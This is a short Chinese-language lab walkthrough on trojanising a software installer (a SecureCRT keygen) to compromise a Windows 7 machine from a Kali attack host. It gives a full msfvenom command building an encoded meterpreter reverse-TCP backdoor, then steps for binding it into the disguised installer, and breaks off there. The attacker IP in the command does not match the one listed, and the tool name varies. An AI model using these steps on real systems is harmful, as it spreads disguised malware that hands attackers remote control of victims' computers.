一、某软件捆绑恶意程序渗透windows
实验环境:
某软件安装包
kali攻击机(192.168.98.30)
win7目标机(192.168.98.35)
blinding编译工具
实验步骤:
1、通过xshell上传blinding 、 SecureCRT-kg.exe 、 SecureCRT-kg.ico到kali机
2、生成后门
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.169.98.30 LPORT=5555 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o msf.exe
3、给blinding赋予执行权限,使用blinding将msf后门捆绑到某软件 SecureCRT-kg.exe
chmod +x binding
./binding